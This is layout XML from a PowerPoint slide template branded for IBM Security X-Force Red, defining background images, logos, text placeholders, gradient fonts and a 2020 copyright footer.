            <a:schemeClr val="tx1"/>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5752911"/>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295903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3"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7362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9" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E28EDC7-F807-9A48-942A-AAC999BCDF70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip/>
          <a:srcRect b="15768"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="X-ForceRed_lockup_rev_RGB.png" descr="X-ForceRed_lockup_rev_RGB.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A26987FB-FF50-A642-A909-D85D75DC2806}"/>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90684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E765D09-6964-A347-A734-8C98F2F8DCD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654296" y="1089112"/>
            <a:ext cx="4297680" cy="3272575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:defRPr sz="9600" b="0" i="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="D02471"/>
                    </a:gs>
                    <a:gs pos="70000">
                      <a:srgbClr val="D91E28"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="18000000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="IBM Plex Sans ExtraLight" panose="020B0303050203000203" pitchFamily="34" charset="0"/>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add text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3473734894"/>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12E5454F-7111-BE42-886E-9D3C3DFB0D4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654296" y="1088135"/>
            <a:ext cx="4297680" cy="3271139"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:defRPr sz="9600" b="0" i="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="D02471"/>
                    </a:gs>
                    <a:gs pos="70000">
                      <a:srgbClr val="D91E28"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="18000000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="IBM Plex Sans ExtraLight" panose="020B0303050203000203" pitchFamily="34" charset="0"/>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add text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268689995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10686743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04156175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6" y="1941928"/>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5" y="1941928"/>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4"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47"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rgbClr val="9FA5AD"/>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rgbClr val="9FA5AD"/>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4"/>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24811597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10" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A689ED6-7AF5-884C-B6AD-6368F74C6A6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="-1657350" y="1657350"/>
            <a:ext cx="5143500" cy="1828800"/>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065759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10" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A689ED6-7AF5-884C-B6AD-6368F74C6A6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="-1657350" y="1657350"/>
            <a:ext cx="5143500" cy="1828800"/>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065759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39"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4" y="2042568"/>
            <a:ext cx="4168775" cy="138361"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="457200">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3"/>
            <a:ext cx="4293672" cy="1343453"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:tabLst/>
              <a:defRPr sz="9600">
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="D02471"/>
                    </a:gs>
                    <a:gs pos="70000">
                      <a:srgbClr val="DA1E28"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="18000000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="IBM Plex Sans ExtraLight"/>
                <a:ea typeface="IBM Plex Sans ExtraLight"/>
                <a:cs typeface="IBM Plex Sans ExtraLight"/>
                <a:sym typeface="IBM Plex Sans ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="371985"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56" indent="-306544">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80" indent="-42020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810"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dirty="0"/>
              <a:t>IBM Security X-Force Red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2338965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pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="XFR-aurora-image.jpg" descr="XFR-aurora-image.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15F3DA1E-58FF-414D-86AD-C7BF91E32B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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dirty="0"/>
              <a:t>IBM Security X-Force Red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94843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pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="XFR-aurora-image.jpg" descr="XFR-aurora-image.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15F3DA1E-58FF-414D-86AD-C7BF91E32B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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dirty="0"/>
              <a:t>IBM Security X-Force Red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9484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7" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13699D9-8E12-8D49-B239-19B73368E46E}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="X-ForceRed_lockup_rev_RGB.png" descr="X-ForceRed_lockup_rev_RGB.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5749E31-3CD4-D94F-8B16-3B0F213AB09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>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1204600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7" y="-1"/>
            <a:ext cx="4572001" cy="5143501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91439" bIns="9143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0"/>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0"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10754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34848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a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1124" name="Body Level One…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5385816" y="1350748"/>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2"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dirty="0"/>
              <a:t>IBM Security X-Force Red / © 2020 IBM Corporation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41901749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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39288869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09611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aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C02C5F32-9CE7-8544-BA8C-91FCA8F80DA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1093688" y="1657349"/>
            <a:ext cx="5143501" cy="1828801"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3716408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96" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B58FE6A3-6DD1-5C47-8683-B69134AF181E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>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dirty="0"/>
              <a:t>IBM Security X-Force Red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834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6" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF739527-44EF-3D48-B71D-C23CFA61DEEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip/>
          <a:srcRect l="14621" r="14575"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3708401" y="-292100"/>
            <a:ext cx="5143498" cy="5727701"/>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dirty="0"/>
              <a:t>IBM Security X-Force Red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36907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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29962711-E66C-FB48-937E-35D9858AE630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2583595"/>
            <a:ext cx="9144000" cy="2336801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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5999"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2249384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00" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5C870FD-688A-454D-ABF5-8555C24C1B02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="2336800"/>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dirty="0"/>
              <a:t>IBM Security X-Force Red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5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADE7190F-304F-1A4A-A8CD-94369ED5C7BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2365283" y="1089818"/>
            <a:ext cx="2003517" cy="326945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
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{883B9676-D6E2-5442-A2F2-716B33038458}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4649411" y="1089818"/>
            <a:ext cx="2003517" cy="326945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
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F67F8C3D-B2EF-214B-8E15-FE13EA385DE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6937283" y="1089817"/>
            <a:ext cx="2006692" cy="326828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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4242911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9" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E28EDC7-F807-9A48-942A-AAC999BCDF70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="15768"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="X-ForceRed_lockup_rev_RGB.png" descr="X-ForceRed_lockup_rev_RGB.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A26987FB-FF50-A642-A909-D85D75DC2806}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>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906844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97" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4494E9BF-5E35-7344-8143-FE489FFC301C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="2336800"/>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dirty="0"/>
              <a:t>IBM Security X-Force Red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94042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92" name="X-Force_Red_logo_grd_color_RGB.png" descr="X-Force_Red_logo_grd_color_RGB.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A15FD99-CF2E-5B4C-9655-2792DCC8D928}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3483923" y="1247135"/>
            <a:ext cx="2176153" cy="2649230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6048447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93" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21D58E78-4E30-2D40-9D71-3639DECE7D61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip/>
          <a:srcRect l="29222" r="10778" b="40000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1568" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>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747045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55" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F62A9E05-D42F-9D45-B7B7-38B8DB99CA2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="X-ForceRed_lockup_rev_RGB.png" descr="X-ForceRed_lockup_rev_RGB.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69D7EA34-5535-0F48-87EE-61FA410F310F}"/>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6845182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3" y="168828"/>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52" descr="A close up of a logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31454A06-245B-A140-95E4-5463AF5C85FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>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2071673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6" name="X-ForceRed_lockup_rev_RGB.png" descr="X-ForceRed_lockup_rev_RGB.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487F177C-A869-7F41-A694-16E3DEF9943F}"/>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858210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A close up of a logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AAF1587-2D84-2B40-ABD1-26D91C729070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>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1817916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52" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{110989B0-CF01-0248-B000-BBE676924319}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip/>
          <a:srcRect l="29223" r="10777" b="40000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143995" cy="5143497"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1622" name="Picture 5" descr="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3925952" y="2315616"/>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4"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56359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6" name="X-ForceRed_lockup_rev_RGB.png" descr="X-ForceRed_lockup_rev_RGB.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487F177C-A869-7F41-A694-16E3DEF9943F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>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858210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A close up of a logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AAF1587-2D84-2B40-ABD1-26D91C729070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>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18179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19"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0"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2041574"/>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aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C02C5F32-9CE7-8544-BA8C-91FCA8F80DA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1093688" y="1657349"/>
            <a:ext cx="5143501" cy="1828801"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37164083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96" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
